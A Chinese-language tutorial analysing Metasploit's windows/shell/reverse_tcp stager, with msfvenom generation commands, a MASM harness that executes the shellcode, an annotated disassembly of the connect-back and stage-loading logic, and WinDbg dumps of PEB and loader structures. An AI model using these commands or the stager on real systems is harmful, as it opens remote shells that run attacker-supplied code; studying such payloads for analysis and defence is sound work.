shellcode生成
在 Kali 中使用 Metasploit 的 msfvenom 生成 shellcode：raw 格式供 ndisasm 反汇编；num 格式输出数值形式的字节列表，再手工改写成 MASM 的 db 语法。注意 windows/shell/reverse_tcp 是分阶段（staged）载荷，下面分析的只是 stager——它回连后再接收并执行真正的 stage；LHOST/LPORT 会被硬编码进 shellcode（见反汇编中压入的 sockaddr_in 常量）。
# Staged payload: the output is only the stager; LHOST (and the default LPORT 4444) are baked into it.
msfvenom --payload windows/shell/reverse_tcp LHOST=kalihost --format raw --out shellcode.raw
# num format: a numeric byte list, rewritten by hand as the MASM `db` line used below.
msfvenom --payload windows/shell/reverse_tcp LHOST=kalihost --format num --out shellcode.db
为了得到一个可执行的 shellcode 方便调试，使用 MASM 编写一个跳入 shellcode 的程序。注意存放 shellcode 的节必须可执行：如果进程启用了 DEP/NX，放在 .data 中的字节在 call 时会触发访问违例，应放在 .code 节或先用 VirtualProtect 改为可执行。该程序只应在隔离的实验虚拟机中运行，因为 stager 会回连 LHOST 并执行接收到的任意代码。
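; Minimal MASM harness: jump into the Metasploit reverse_tcp stager so it
; can be single-stepped in a debugger (the PEB/Ldr dumps below were taken
; from this process under WinDbg).
; Run only in an isolated lab VM: the stager connects back to LHOST:LPORT
; and executes whatever it receives.
.686p
.mmx
.model flat,stdcall
include windows.inc

.code
; The shellcode bytes live in the code section, which is mapped
; read+execute, so `call eax` below still works if DEP/NX is enforced for
; the process (bytes kept in .data would fault with an access violation).
; The stager never writes to its own bytes, so a read-only section is fine.
; Bytes are msfvenom's `-f num` output rewritten in MASM syntax.
shellcode db 0fch, 0e8h, 082h, 000h, 000h, 000h, 060h, 089h, 0e5h, 031h, 0c0h, 064h, 08bh, 050h, 030h
; ... remaining bytes from shellcode.db go here ...

start:
    ; Control never comes back: the stager either `ret`s into the
    ; downloaded stage or calls ExitProcess when connect/recv fail.
    lea     eax, shellcode          ; eax = &shellcode
    call    eax                     ; enter the stager
end start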
分析汇编代码
使用 ndisasm 工具得到 shellcode 的汇编代码（-b 32 表示按 32 位解码，地址是相对缓冲区起始的偏移）。整体结构：0x06–0x87 是基于 ROR13 哈希的 API 解析例程（调用方式为先压入 API 参数，再压入 32 位哈希值，然后 call ebp）；0x88 起为主流程：LoadLibraryA("ws2_32") → WSAStartup → WSASocketA → connect（最多重试 5 次）→ recv 4 字节的 stage 长度 → VirtualAlloc 分配 RWX 内存 → 循环 recv 接收 stage → ret 跳入 stage。
# -u is ndisasm's shorthand for -b 32 (decode as 32-bit code); offsets are relative to the buffer start.
ndisasm -u shellcode.raw > shellcode.asm
; Metasploit windows/shell/reverse_tcp stager (x86), ndisasm -b 32 output.
; Layout:
;   0x00       cld; call 0x88   -> pushes 0x06 so ebp can become the api_call address
;   0x06-0x87  api_call: hash-based API resolver (PEB -> Ldr -> export tables)
;   0x88-0x12a main: LoadLibraryA("ws2_32"), WSAStartup, WSASocketA, connect,
;              recv 4-byte length, VirtualAlloc RWX, recv stage, ret into stage
; api_call convention: push the API's arguments (right to left), push the
; 32-bit hash, `call ebp`. The resolver removes the hash, tail-jumps to the API
; with the arguments in place, and the API's own `ret` returns to the caller.
; Hash = ror13/add over the module's BaseDllName bytes (UTF-16, upper-cased)
; plus ror13/add over the ASCII export name including its NUL terminator.
00000000 FC cld ; DF=0 so lodsb walks forward in the hash loops
00000001 E882000000 call dword 0x88 ; pushes 0x06 (api_call entry); popped into ebp at 0x88
00000006 60 pushad ; api_call: save all regs (eax saved at [ebp+0x1c] after the next insn)
00000007 89E5 mov ebp,esp ; [ebp+0x20] = caller's return addr, [ebp+0x24] = requested hash
00000009 31C0 xor eax,eax ; ah stays 0 for the rest of api_call (used by cmp al,ah at 0x55)
0000000B 648B5030 mov edx,[fs:eax+0x30] ; TEB->PEB (fs:[0x30])
0000000F 8B520C mov edx,[edx+0xc] ; PEB->Ldr (PEB_LDR_DATA)
00000012 8B5214 mov edx,[edx+0x14] ; Ldr->InMemoryOrderModuleList.Flink = first LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks (entry+0x08)
00000015 8B7228 mov esi,[edx+0x28] ; next-module loop head: esi = BaseDllName.Buffer (UTF-16; entry+0x30)
00000018 0FB74A26 movzx ecx,word [edx+0x26] ; ecx = BaseDllName.MaximumLength in bytes (entry+0x2e), incl. the NUL
0000001C 31FF xor edi,edi ; edi = running module-name hash
0000001E AC lodsb ; one byte per iteration, so the 0x00 high bytes of UTF-16 are hashed too
0000001F 3C61 cmp al,0x61
00000021 7C02 jl 0x25 ; below 'a': leave as is
00000023 2C20 sub al,0x20 ; 'a'..: to upper case, so the module-name hash is case-insensitive
00000025 C1CF0D ror edi,byte 0xd
00000028 01C7 add edi,eax ; hash = ror(hash,13) + byte
0000002A E2F2 loop 0x1e
0000002C 52 push edx ; [ebp-4] = current module entry (InMemoryOrderLinks)
0000002D 57 push edi ; [ebp-8] = module-name hash
0000002E 8B5210 mov edx,[edx+0x10] ; edx = DllBase (entry+0x18)
00000031 8B4A3C mov ecx,[edx+0x3c] ; IMAGE_DOS_HEADER.e_lfanew
00000034 8B4C1178 mov ecx,[ecx+edx+0x78] ; IMAGE_NT_HEADERS+0x78 = DataDirectory[0].VirtualAddress = export table RVA
00000038 E348 jecxz 0x82 ; no export table: next module
0000003A 01D1 add ecx,edx ; ecx = IMAGE_EXPORT_DIRECTORY (VA)
0000003C 51 push ecx ; [ebp-0xc] = export directory, needed again after the name loop
0000003D 8B5920 mov ebx,[ecx+0x20] ; AddressOfNames RVA
00000040 01D3 add ebx,edx ; ebx = AddressOfNames (VA)
00000042 8B4918 mov ecx,[ecx+0x18] ; ecx = NumberOfNames
00000045 E33A jecxz 0x81 ; all names tried: pop export dir and move on
00000047 49 dec ecx ; walk the name table from the last entry downwards
00000048 8B348B mov esi,[ebx+ecx*4]
0000004B 01D6 add esi,edx ; esi = export name (ASCII, NUL-terminated)
0000004D 31FF xor edi,edi ; edi = running function-name hash
0000004F AC lodsb
00000050 C1CF0D ror edi,byte 0xd
00000053 01C7 add edi,eax
00000055 38E0 cmp al,ah ; ah == 0: stop once the NUL has been folded in
00000057 75F6 jnz 0x4f
00000059 037DF8 add edi,[ebp-0x8] ; total = module hash + function hash
0000005C 3B7D24 cmp edi,[ebp+0x24] ; compare with the hash the caller pushed
0000005F 75E4 jnz 0x45 ; no match: previous name
00000061 58 pop eax ; eax = export directory
00000062 8B5824 mov ebx,[eax+0x24] ; AddressOfNameOrdinals RVA
00000065 01D3 add ebx,edx
00000067 668B0C4B mov cx,[ebx+ecx*2] ; cx = ordinal of the matched name
0000006B 8B581C mov ebx,[eax+0x1c] ; AddressOfFunctions RVA
0000006E 01D3 add ebx,edx
00000070 8B048B mov eax,[ebx+ecx*4]
00000073 01D0 add eax,edx ; eax = resolved API address (no handling of forwarded exports)
00000075 89442424 mov [esp+0x24],eax ; overwrite the saved eax in the pushad frame so popad returns the address
00000079 5B pop ebx ; discard module hash
0000007A 5B pop ebx ; discard module entry
0000007B 61 popad ; restore regs; eax = API address
0000007C 59 pop ecx ; ecx = return address of the api_call caller
0000007D 5A pop edx ; drop the hash argument so the API sees its own args on top
0000007E 51 push ecx ; re-push the return address: the API's ret goes straight back to the caller
0000007F FFE0 jmp eax ; tail-jump into the API
00000081 5F pop edi ; discard export directory (entered from 0x45)
00000082 5F pop edi ; discard module hash (entered from 0x38): next module
00000083 5A pop edx ; edx = module entry
00000084 8B12 mov edx,[edx] ; InMemoryOrderLinks.Flink -> next module
00000086 EB8D jmp short 0x15 ; list is circular: an unknown hash loops here forever
00000088 5D pop ebp ; main: ebp = 0x06 (api_call), pushed by the call at 0x01
00000089 6833320000 push dword 0x3233 ; "32\0\0"
0000008E 687773325F push dword 0x5f327377 ; "ws2_" -> "ws2_32" now on the stack
00000093 54 push esp ; lpLibFileName = &"ws2_32"
00000094 684C772607 push dword 0x726774c ; hash: kernel32.dll!LoadLibraryA
00000099 FFD5 call ebp ; LoadLibraryA("ws2_32")
0000009B B890010000 mov eax,0x190
000000A0 29C4 sub esp,eax ; reserve 0x190 bytes for WSADATA
000000A2 54 push esp ; lpWSAData
000000A3 50 push eax ; wVersionRequested = 0x190 (same constant reused)
000000A4 6829806B00 push dword 0x6b8029 ; hash: ws2_32.dll!WSAStartup
000000A9 FFD5 call ebp ; WSAStartup(0x190, &wsadata)
000000AB 50 push eax ; dwFlags = 0 (eax is 0 on success; not checked)
000000AC 50 push eax ; g = 0
000000AD 50 push eax ; lpProtocolInfo = NULL
000000AE 50 push eax ; protocol = 0
000000AF 40 inc eax
000000B0 50 push eax ; type = 1 (SOCK_STREAM)
000000B1 40 inc eax
000000B2 50 push eax ; af = 2 (AF_INET)
000000B3 68EA0FDFE0 push dword 0xe0df0fea ; hash: ws2_32.dll!WSASocketA
000000B8 FFD5 call ebp ; WSASocketA(AF_INET, SOCK_STREAM, 0, NULL, 0, 0)
000000BA 97 xchg eax,edi ; edi = socket
000000BB 6A05 push byte +0x5 ; connect retry counter, addressed as [esi+8] below
000000BD 68C0A8CF89 push dword 0x89cfa8c0 ; sin_addr: bytes c0 a8 cf 89 = 192.168.207.137 (LHOST)
000000C2 680200115C push dword 0x5c110002 ; sin_family = 2 (AF_INET), sin_port = 0x115c big-endian = 4444 (LPORT)
000000C7 89E6 mov esi,esp ; esi = &sockaddr_in
000000C9 6A10 push byte +0x10 ; namelen = 16
000000CB 56 push esi ; name
000000CC 57 push edi ; s
000000CD 6899A57461 push dword 0x6174a599 ; hash: ws2_32.dll!connect
000000D2 FFD5 call ebp ; connect(s, &sockaddr_in, 16)
000000D4 85C0 test eax,eax
000000D6 740A jz 0xe2 ; connected
000000D8 FF4E08 dec dword [esi+0x8] ; retry counter (the 5 pushed at 0xbb)
000000DB 75EC jnz 0xc9 ; retry connect
000000DD E83F000000 call dword 0x121 ; retries exhausted or recv failed: ExitProcess
000000E2 6A00 push byte +0x0 ; flags = 0
000000E4 6A04 push byte +0x4 ; len = 4
000000E6 56 push esi ; buf = the sockaddr_in slot, reused
000000E7 57 push edi ; s
000000E8 6802D9C85F push dword 0x5fc8d902 ; hash: ws2_32.dll!recv
000000ED FFD5 call ebp ; recv(s, buf, 4, 0): 4-byte little-endian stage length
000000EF 83F800 cmp eax,byte +0x0
000000F2 7EE9 jng 0xdd ; <= 0: error or closed -> exit
000000F4 8B36 mov esi,[esi] ; esi = stage length (peer-controlled, no upper bound)
000000F6 6A40 push byte +0x40 ; flProtect = PAGE_EXECUTE_READWRITE
000000F8 6800100000 push dword 0x1000 ; flAllocationType = MEM_COMMIT
000000FD 56 push esi ; dwSize = stage length
000000FE 6A00 push byte +0x0 ; lpAddress = NULL
00000100 6858A453E5 push dword 0xe553a458 ; hash: kernel32.dll!VirtualAlloc
00000105 FFD5 call ebp ; VirtualAlloc(NULL, len, MEM_COMMIT, PAGE_EXECUTE_READWRITE); NULL return not checked
00000107 93 xchg eax,ebx ; ebx = RWX buffer
00000108 53 push ebx ; buffer start: popped by the ret at 0x120
00000109 6A00 push byte +0x0 ; flags = 0
0000010B 56 push esi ; len = bytes still missing
0000010C 53 push ebx ; buf = current write position
0000010D 57 push edi ; s
0000010E 6802D9C85F push dword 0x5fc8d902 ; hash: ws2_32.dll!recv
00000113 FFD5 call ebp ; recv(s, buf, remaining, 0)
00000115 83F800 cmp eax,byte +0x0
00000118 7EC3 jng 0xdd ; error or closed -> exit
0000011A 01C3 add ebx,eax ; advance write position
0000011C 29C6 sub esi,eax ; remaining -= received
0000011E 75E9 jnz 0x109 ; loop until the whole stage is in
00000120 C3 ret ; "return" to the buffer start pushed at 0x108: executes the stage
00000121 BBF0B5A256 mov ebx,0x56a2b5f0 ; hash: kernel32.dll!ExitProcess
00000126 6A00 push byte +0x0 ; uExitCode = 0
00000128 53 push ebx
00000129 FFD5 call ebp ; ExitProcess(0)
关键步骤
1. 通过 FS 段寄存器指向的 TEB 找到 PEB（fs:[0x30]），再经 PEB+0x0C 的 Ldr（PEB_LDR_DATA）和 Ldr+0x14 的 InMemoryOrderModuleList 遍历每个 LDR_DATA_TABLE_ENTRY，读取模块名（BaseDllName）并取得模块基址（DllBase）。注意链表指针指向的是结构体内偏移 0x08 的 InMemoryOrderLinks 字段，因此 shellcode 中的偏移都比结构体定义的偏移小 8。
// PEB as seen by the stager. This is an older, abbreviated PEB layout (the
// Win10 `dt _PEB` dump below shows more and partly renamed fields); the only
// offset the stager depends on is +0x00C, and that has not moved.
typedef struct _PEB { // Size: 0x1D8 (older layout; the Win10 dump is larger)
/*000*/ UCHAR InheritedAddressSpace;
/*001*/ UCHAR ReadImageFileExecOptions;
/*002*/ UCHAR BeingDebugged; // 1 while a debugger is attached (the !peb dump shows "Yes")
/*003*/ UCHAR SpareBool; // Allocation size
/*004*/ HANDLE Mutant;
/*008*/ HINSTANCE ImageBaseAddress; // Instance; 0x00400000 for t.exe in the dump
/*00C*/ VOID *DllList; // = Ldr (PPEB_LDR_DATA) in the dumps; read by the stager with mov edx,[edx+0xc]
/*010*/ PPROCESS_PARAMETERS *ProcessParameters;
/*014*/ ULONG SubSystemData;
/*018*/ HANDLE DefaultHeap;
/*01C*/ KSPIN_LOCK FastPebLock;
/*020*/ ULONG FastPebLockRoutine;
/*024*/ ULONG FastPebUnlockRoutine;
/*028*/ ULONG EnvironmentUpdateCount;
/*02C*/ ULONG KernelCallbackTable;
/*030*/ LARGE_INTEGER SystemReserved;
/*038*/ ULONG FreeList;
/*03C*/ ULONG TlsExpansionCounter;
/*040*/ ULONG TlsBitmap;
/*044*/ LARGE_INTEGER TlsBitmapBits;
/*04C*/ ULONG ReadOnlySharedMemoryBase;
/*050*/ ULONG ReadOnlySharedMemoryHeap;
/*054*/ ULONG ReadOnlyStaticServerData;
/*058*/ ULONG AnsiCodePageData;
/*05C*/ ULONG OemCodePageData;
/*060*/ ULONG UnicodeCaseTableData;
/*064*/ ULONG NumberOfProcessors;
/*068*/ LARGE_INTEGER NtGlobalFlag; // Address of a local copy
/*070*/ LARGE_INTEGER CriticalSectionTimeout;
/*078*/ ULONG HeapSegmentReserve;
/*07C*/ ULONG HeapSegmentCommit;
/*080*/ ULONG HeapDeCommitTotalFreeThreshold;
/*084*/ ULONG HeapDeCommitFreeBlockThreshold;
/*088*/ ULONG NumberOfHeaps;
/*08C*/ ULONG MaximumNumberOfHeaps;
/*090*/ ULONG ProcessHeaps;
/*094*/ ULONG GdiSharedHandleTable;
/*098*/ ULONG ProcessStarterHelper;
/*09C*/ ULONG GdiDCAttributeList;
/*0A0*/ KSPIN_LOCK LoaderLock;
/*0A4*/ ULONG OSMajorVersion; // 0xa in the dump (Windows 10)
/*0A8*/ ULONG OSMinorVersion;
/*0AC*/ USHORT OSBuildNumber;
/*0AE*/ USHORT OSCSDVersion;
/*0B0*/ ULONG OSPlatformId;
/*0B4*/ ULONG ImageSubsystem;
/*0B8*/ ULONG ImageSubsystemMajorVersion;
/*0BC*/ ULONG ImageSubsystemMinorVersion;
/*0C0*/ ULONG ImageProcessAffinityMask;
/*0C4*/ ULONG GdiHandleBuffer[0x22];
/*14C*/ ULONG PostProcessInitRoutine;
/*150*/ ULONG TlsExpansionBitmap;
/*154*/ UCHAR TlsExpansionBitmapBits[0x80];
/*1D4*/ ULONG SessionId;
} PEB, *PPEB;
0:000> !peb
PEB at 00215000
InheritedAddressSpace: No
ReadImageFileExecOptions: No
BeingDebugged: Yes
ImageBaseAddress: 00400000
Ldr 7732ebe0
Ldr.Initialized: Yes
Ldr.InInitializationOrderModuleList: 004c2ea8 . 004c3fc8
Ldr.InLoadOrderModuleList: 004c2fa0 . 004c3fb8
Ldr.InMemoryOrderModuleList: 004c2fa8 . 004c3fc0
Base TimeStamp Module
400000 57e92185 Sep 26 21:24:21 2016 E:\WorkSpace\shellcode\t.exe
77220000 57b7e09e Aug 20 12:46:22 2016 C:\WINDOWS\SYSTEM32\ntdll.dll
75470000 57898ef6 Jul 16 09:33:42 2016 C:\WINDOWS\System32\KERNEL32.DLL
759a0000 57cf98b1 Sep 07 12:33:53 2016 C:\WINDOWS\System32\KERNELBASE.dll
70740000 57898eeb Jul 16 09:33:31 2016 C:\WINDOWS\system32\apphelp.dll
SubSystemData: 00000000
ProcessHeap: 004c0000
ProcessParameters: 004c18e0
CurrentDirectory: 'C:\Program Files (x86)\Windows Kits\10\Debuggers\'
WindowTitle: 'E:\WorkSpace\shellcode\t.exe'
ImageFile: 'E:\WorkSpace\shellcode\t.exe'
CommandLine: 'E:\WorkSpace\shellcode\t.exe'
DllPath: '< Name not readable >'
Environment: 004c09c8
ALLUSERSPROFILE=C:\ProgramData
APPDATA=C:\Users\youmu\AppData\Roaming
CommonProgramFiles=C:\Program Files (x86)\Common Files
CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files
CommonProgramW6432=C:\Program Files\Common Files
COMPUTERNAME=DESKTOP-53KKBMH
ComSpec=C:\WINDOWS\system32\cmd.exe
FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer
FPS_BROWSER_USER_PROFILE_STRING=Default
HOMEDRIVE=C:
HOMEPATH=\Users\youmu
LANG=zh_CN
LOCALAPPDATA=C:\Users\youmu\AppData\Local
LOGONSERVER=\\DESKTOP-53KKBMH
MOZ_PLUGIN_PATH=D:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\
NUMBER_OF_PROCESSORS=4
OS=Windows_NT
Path=C:\Program Files (x86)\Windows Kits\10\Debuggers\x86;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;C:\Program Files (x86)\Windows Kits\8.1\Windows Performance Toolkit\;C:\Python27;D:\Program Files\010 Editor;D:\Program\nasm-2.12.02-win32\nasm-2.12.02;D:\Program\putty;C:\Users\youmu\AppData\Local\Microsoft\WindowsApps;
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_ARCHITEW6432=AMD64
PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 60 Stepping 3, GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=3c03
ProgramData=C:\ProgramData
ProgramFiles=C:\Program Files (x86)
ProgramFiles(x86)=C:\Program Files (x86)
ProgramW6432=C:\Program Files
PSModulePath=C:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\
PUBLIC=C:\Users\Public
SESSIONNAME=Console
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\Users\youmu\AppData\Local\Temp
TMP=C:\Users\youmu\AppData\Local\Temp
USERDOMAIN=DESKTOP-53KKBMH
USERDOMAIN_ROAMINGPROFILE=DESKTOP-53KKBMH
USERNAME=youmu
USERPROFILE=C:\Users\youmu
VBOX_MSI_INSTALL_PATH=C:\Program Files\Oracle\VirtualBox\
VS140COMNTOOLS=C:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\Tools\
WINDBG_DIR=C:\Program Files (x86)\Windows Kits\10\Debuggers\x86
windir=C:\WINDOWS
0:000> dt _PEB @$peb
ntdll!_PEB
+0x000 InheritedAddressSpace : 0 ''
+0x001 ReadImageFileExecOptions : 0 ''
+0x002 BeingDebugged : 0x1 ''
+0x003 BitField : 0 ''
+0x003 ImageUsesLargePages : 0y0
+0x003 IsProtectedProcess : 0y0
+0x003 IsImageDynamicallyRelocated : 0y0
+0x003 SkipPatchingUser32Forwarders : 0y0
+0x003 IsPackagedProcess : 0y0
+0x003 IsAppContainer : 0y0
+0x003 IsProtectedProcessLight : 0y0
+0x003 IsLongPathAwareProcess : 0y0
+0x004 Mutant : 0xffffffff Void
+0x008 ImageBaseAddress : 0x00400000 Void
+0x00c Ldr : 0x7732ebe0 _PEB_LDR_DATA
+0x010 ProcessParameters : 0x004c18e0 _RTL_USER_PROCESS_PARAMETERS
+0x014 SubSystemData : (null)
+0x018 ProcessHeap : 0x004c0000 Void
+0x01c FastPebLock : 0x7732e9a0 _RTL_CRITICAL_SECTION
+0x020 AtlThunkSListPtr : (null)
+0x024 IFEOKey : (null)
+0x028 CrossProcessFlags : 1
+0x028 ProcessInJob : 0y1
+0x028 ProcessInitializing : 0y0
+0x028 ProcessUsingVEH : 0y0
+0x028 ProcessUsingVCH : 0y0
+0x028 ProcessUsingFTH : 0y0
+0x028 ReservedBits0 : 0y000000000000000000000000000 (0)
+0x02c KernelCallbackTable : (null)
+0x02c UserSharedInfoPtr : (null)
+0x030 SystemReserved : [1] 0
+0x034 AtlThunkSListPtr32 : (null)
+0x038 ApiSetMap : 0x00040000 Void
+0x03c TlsExpansionCounter : 0
+0x040 TlsBitmap : 0x7732eb80 Void
+0x044 TlsBitmapBits : [2] 0x10001
+0x04c ReadOnlySharedMemoryBase : 0x7fea0000 Void
+0x050 SparePvoid0 : (null)
+0x054 ReadOnlyStaticServerData : 0x7fea0730 -> (null)
+0x058 AnsiCodePageData : 0x7ffa0000 Void
+0x05c OemCodePageData : 0x7ffa0000 Void
+0x060 UnicodeCaseTableData : 0x7ffd0028 Void
+0x064 NumberOfProcessors : 4
+0x068 NtGlobalFlag : 0x70
+0x070 CriticalSectionTimeout : _LARGE_INTEGER 0xffffe86d`079b8000
+0x078 HeapSegmentReserve : 0x100000
+0x07c HeapSegmentCommit : 0x2000
+0x080 HeapDeCommitTotalFreeThreshold : 0x10000
+0x084 HeapDeCommitFreeBlockThreshold : 0x1000
+0x088 NumberOfHeaps : 1
+0x08c MaximumNumberOfHeaps : 0x10
+0x090 ProcessHeaps : 0x7732d6c0 -> 0x004c0000 Void
+0x094 GdiSharedHandleTable : (null)
+0x098 ProcessStarterHelper : (null)
+0x09c GdiDCAttributeList : 0
+0x0a0 LoaderLock : 0x7732c3b8 _RTL_CRITICAL_SECTION
+0x0a4 OSMajorVersion : 0xa
+0x0a8 OSMinorVersion : 0
+0x0ac OSBuildNumber : 0x3839
+0x0ae OSCSDVersion : 0
+0x0b0 OSPlatformId : 2
+0x0b4 ImageSubsystem : 3
+0x0b8 ImageSubsystemMajorVersion : 4
+0x0bc ImageSubsystemMinorVersion : 0
+0x0c0 ActiveProcessAffinityMask : 0xf
+0x0c4 GdiHandleBuffer : [34] 0
+0x14c PostProcessInitRoutine : (null)
+0x150 TlsExpansionBitmap : 0x7732eb70 Void
+0x154 TlsExpansionBitmapBits : [32] 1
+0x1d4 SessionId : 6
+0x1d8 AppCompatFlags : _ULARGE_INTEGER 0x0
+0x1e0 AppCompatFlagsUser : _ULARGE_INTEGER 0x0
+0x1e8 pShimData : 0x001b0000 Void
+0x1ec AppCompatInfo : (null)
+0x1f0 CSDVersion : _UNICODE_STRING ""
+0x1f8 ActivationContextData : (null)
+0x1fc ProcessAssemblyStorageMap : (null)
+0x200 SystemDefaultActivationContextData : 0x001a0000 _ACTIVATION_CONTEXT_DATA
+0x204 SystemAssemblyStorageMap : (null)
+0x208 MinimumStackCommit : 0
+0x20c FlsCallback : (null)
+0x210 FlsListHead : _LIST_ENTRY [ 0x215210 - 0x215210 ]
+0x218 FlsBitmap : 0x7732eba8 Void
+0x21c FlsBitmapBits : [4] 1
+0x22c FlsHighIndex : 0
+0x230 WerRegistrationData : (null)
+0x234 WerShipAssertPtr : (null)
+0x238 pUnused : (null)
+0x23c pImageHeaderHash : (null)
+0x240 TracingFlags : 0
+0x240 HeapTracingEnabled : 0y0
+0x240 CritSecTracingEnabled : 0y0
+0x240 LibLoaderTracingEnabled : 0y0
+0x240 SpareTracingBits : 0y00000000000000000000000000000 (0)
+0x248 CsrServerReadOnlySharedMemoryBase : 0x00007ff7`4fa00000
+0x250 TppWorkerpListLock : 0
+0x254 TppWorkerpList : _LIST_ENTRY [ 0x215254 - 0x215254 ]
+0x25c WaitOnAddressHashTable : [128] (null)
// Loader data reached via PEB+0x0C. Each LIST_ENTRY heads a circular,
// doubly-linked list of LDR_DATA_TABLE_ENTRY, linked through a different
// embedded LIST_ENTRY field of the entry. The stager walks
// InMemoryOrderModuleList (mov edx,[edx+0x14] at offset 0x12 of the listing);
// the `dt _PEB_LDR_DATA` dump below confirms the +0x14 offset on Win10.
typedef struct _PEB_LDR_DATA
{
ULONG Length; // +0x00 (0x30 in the dump: Win10 appends three more fields)
BOOLEAN Initialized; // +0x04
PVOID SsHandle; // +0x08
LIST_ENTRY InLoadOrderModuleList; // +0x0c  entries linked via InLoadOrderLinks (entry+0x00)
LIST_ENTRY InMemoryOrderModuleList; // +0x14  entries linked via InMemoryOrderLinks (entry+0x08); the list the stager walks
LIST_ENTRY InInitializationOrderModuleList;// +0x1c  entries linked via InInitializationOrderLinks (entry+0x10)
} PEB_LDR_DATA,*PPEB_LDR_DATA; // +0x24 here; the dump adds EntryInProgress, ShutdownInProgress, ShutdownThreadId
0:000> dt _PEB_LDR_DATA @edx
ntdll!_PEB_LDR_DATA
+0x000 Length : 0x30
+0x004 Initialized : 0x1 ''
+0x008 SsHandle : (null)
+0x00c InLoadOrderModuleList : _LIST_ENTRY [ 0x4c2fa0 - 0x4c3fb8 ]
+0x014 InMemoryOrderModuleList : _LIST_ENTRY [ 0x4c2fa8 - 0x4c3fc0 ]
+0x01c InInitializationOrderModuleList : _LIST_ENTRY [ 0x4c2ea8 - 0x4c3fc8 ]
+0x024 EntryInProgress : (null)
+0x028 ShutdownInProgress : 0 ''
+0x02c ShutdownThreadId : (null)
// Generic doubly-linked list node. Flink/Blink point at the *embedded*
// LIST_ENTRY inside the neighbouring LDR_DATA_TABLE_ENTRY, not at the entry's
// first byte. For InMemoryOrderLinks that field sits at entry+0x08, which is
// why the dump below uses `dt _LDR_DATA_TABLE_ENTRY @edx-0x8` and why every
// displacement the stager uses ([edx+0x10] DllBase, [edx+0x26]/[edx+0x28]
// BaseDllName) is 8 less than the structure offset. The last node's Flink
// points back at the list head inside PEB_LDR_DATA (0x7732ebf4 in the dump),
// so a walk that never finds its target never terminates.
typedef struct _LIST_ENTRY {
struct _LIST_ENTRY *Flink; // next node
struct _LIST_ENTRY *Blink; // previous node
} LIST_ENTRY, *PLIST_ENTRY, *RESTRICTED_POINTER PRLIST_ENTRY;
0:000> dt _LIST_ENTRY @edx+0x14
ntdll!_LIST_ENTRY
[ 0x4c2fa8 - 0x4c3fc0 ]
+0x000 Flink : 0x004c2fa8 _LIST_ENTRY [ 0x4c2ea0 - 0x7732ebf4 ]
+0x004 Blink : 0x004c3fc0 _LIST_ENTRY [ 0x7732ebf4 - 0x4c36a8 ]
// One loaded module. Offsets in the comments are taken from the Win10 `dt`
// dump that follows; the stager addresses the entry through its
// InMemoryOrderLinks field, so its displacements are (structure offset - 8).
typedef struct _LDR_DATA_TABLE_ENTRY
{
LIST_ENTRY InLoadOrderLinks; // +0x00
LIST_ENTRY InMemoryOrderLinks; // +0x08  edx in the stager points here
LIST_ENTRY InInitializationOrderLinks; // +0x10
PVOID DllBase; // +0x18  stager: mov edx,[edx+0x10]
PVOID EntryPoint; // +0x1c
ULONG SizeOfImage; // +0x20
UNICODE_STRING FullDllName; // +0x24
UNICODE_STRING BaseDllName; // +0x2c  {USHORT Length; USHORT MaximumLength; PWSTR Buffer}: stager reads MaximumLength at [edx+0x26] and Buffer at [edx+0x28]
ULONG Flags; // +0x34
WORD LoadCount; // +0x38  (ObsoleteLoadCount in the Win10 dump)
WORD TlsIndex; // +0x3a
union
{
LIST_ENTRY HashLinks; // +0x3c
struct
{
PVOID SectionPointer;
ULONG CheckSum;
};
};
union
{
ULONG TimeDateStamp; // +0x44
PVOID LoadedImports;
};
_ACTIVATION_CONTEXT * EntryPointActivationContext; // +0x48
// Beyond +0x48 the Win10 dump shows a different tail (Lock, DdagNode, ...);
// none of these fields is used by the stager.
PVOID PatchInformation;
LIST_ENTRY ForwarderLinks;
LIST_ENTRY ServiceTagLinks;
LIST_ENTRY StaticLinks;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
0:000> dt _LDR_DATA_TABLE_ENTRY @edx-0x8
ntdll!_LDR_DATA_TABLE_ENTRY
+0x000 InLoadOrderLinks : _LIST_ENTRY [ 0x4c2e98 - 0x7732ebec ]
+0x008 InMemoryOrderLinks : _LIST_ENTRY [ 0x4c2ea0 - 0x7732ebf4 ]
+0x010 InInitializationOrderLinks : _LIST_ENTRY [ 0x0 - 0x0 ]
+0x018 DllBase : 0x00400000 Void
+0x01c EntryPoint : 0x00401000 Void
+0x020 SizeOfImage : 0x3000
+0x024 FullDllName : _UNICODE_STRING "E:\WorkSpace\shellcode\t.exe"
+0x02c BaseDllName : _UNICODE_STRING "t.exe"
+0x034 FlagGroup : [4] "???"
+0x034 Flags : 0x80002acc
+0x034 PackagedBinary : 0y0
+0x034 MarkedForRemoval : 0y0
+0x034 ImageDll : 0y1
+0x034 LoadNotificationsSent : 0y1
+0x034 TelemetryEntryProcessed : 0y0
+0x034 ProcessStaticImport : 0y0
+0x034 InLegacyLists : 0y1
+0x034 InIndexes : 0y1
+0x034 ShimDll : 0y0
+0x034 InExceptionTable : 0y1
+0x034 ReservedFlags1 : 0y10
+0x034 LoadInProgress : 0y0
+0x034 LoadConfigProcessed : 0y1
+0x034 EntryProcessed : 0y0
+0x034 ProtectDelayLoad : 0y0
+0x034 ReservedFlags3 : 0y00
+0x034 DontCallForThreads : 0y0
+0x034 ProcessAttachCalled : 0y0
+0x034 ProcessAttachFailed : 0y0
+0x034 CorDeferredValidate : 0y0
+0x034 CorImage : 0y0
+0x034 DontRelocate : 0y0
+0x034 CorILOnly : 0y0
+0x034 ReservedFlags5 : 0y000
+0x034 Redirected : 0y0
+0x034 ReservedFlags6 : 0y00
+0x034 CompatDatabaseProcessed : 0y1
+0x038 ObsoleteLoadCount : 0xffff
